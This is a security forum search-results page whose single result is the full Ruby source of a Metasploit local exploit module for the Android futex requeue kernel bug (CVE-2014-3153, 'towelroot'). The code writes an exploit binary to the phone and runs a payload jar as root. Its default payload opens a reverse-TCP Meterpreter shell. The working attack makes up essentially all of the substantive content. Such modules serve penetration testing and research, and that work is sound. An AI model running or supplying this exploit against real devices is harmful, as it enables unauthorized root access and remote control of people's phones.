Jump to content

Search the Community

Showing results for tags 'rootcmd'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Occupation


Interests


Biography


Location

Found 1 result

  1. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' class Metasploit4 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Post::Common def initialize(info={}) super( update_info( info, { 'Name' => 'Android futex requeue kernel exploit', 'Description' => %q{ This module exploits a bug in futex_requeue in the linux kernel. Any android phone with a kernel built before June 2014 should be vulnerable. }, 'License' => MSF_LICENSE, 'Author' => [ 'Pinkie Pie', #discovery 'geohot', #towelroot 'timwr' #metasploit module ], 'References' => [ [ 'CVE', '2014-3153' ], [ 'URL', 'http://tinyhack.com/2014/07/07/exploiting-the-futex-bug-and-uncovering-towelroot/' ], [ 'URL', 'http://blog.nativeflow.com/the-futex-vulnerability' ], ], 'SessionTypes' => [ 'meterpreter' ], 'Platform' => 'android', 'Targets' => [[ 'Automatic', { }]], 'Arch' => ARCH_DALVIK, 'DefaultOptions' => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp', }, 'DefaultTarget' => 0 } )) register_options([ OptString.new("WritableDir", [ true, "Temporary directory to write files", "/data/local/tmp/" ]), ], self.class) end def put_local_file(remotefile) localfile = File.join( Msf::Config.data_directory, "exploits", "CVE-2014-3153.elf" ) data = File.read(localfile, {:mode => 'rb'}) write_file(remotefile, data) end def exploit workingdir = session.fs.dir.getwd exploitfile = "#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}" payloadfile = "#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}" put_local_file(exploitfile) cmd_exec('/system/bin/chmod 700 ' + exploitfile) write_file(payloadfile, payload.raw) tmpdir = datastore['WritableDir'] rootclassdir = "#{tmpdir}#{Rex::Text::rand_text_alpha_lower(5)}" rootpayload = "#{tmpdir}#{Rex::Text::rand_text_alpha_lower(5)}.jar" rootcmd = " mkdir #{rootclassdir} && " rootcmd += "cd #{rootclassdir} && " rootcmd += "cp " + payloadfile + " #{rootpayload} && " rootcmd += "chmod 766 #{rootpayload} && " rootcmd += "dalvikvm -Xbootclasspath:/system/framework/core.jar -cp #{rootpayload} com.metasploit.stage.Payload" process = session.sys.process.execute(exploitfile, rootcmd, {'Hidden' => true, 'Channelized' => true}) process.channel.read end end Source
×
×
  • Create New...